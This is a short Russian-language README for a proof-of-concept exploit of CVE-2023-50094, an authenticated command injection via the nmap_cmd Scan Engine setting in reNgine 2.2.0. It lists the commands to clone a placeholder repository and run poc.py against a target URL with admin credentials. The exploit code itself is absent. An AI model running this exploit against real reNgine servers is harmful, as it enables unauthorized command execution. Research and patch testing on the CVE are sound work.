
PoC для CVE-2023-50094 (внедрение команд в rengine)
Этот скрипт на Python эксплуатирует аутентифицированную уязвимость внедрения команд в reNgine 2.2.0. Эксплойт нацелен на параметр nmap_cmd в конфигурации Scan Engine, что позволяет атакующим выполнять произвольные команды.
requests.Клонируйте репозиторий:
git clone https://github.com/example/rengine-exploit.git
cd rengine-exploit
pip install requests
Запуск скрипта:
python poc.py --url http://rengine.target.com --username admin --password securepassword123 --engine-id 2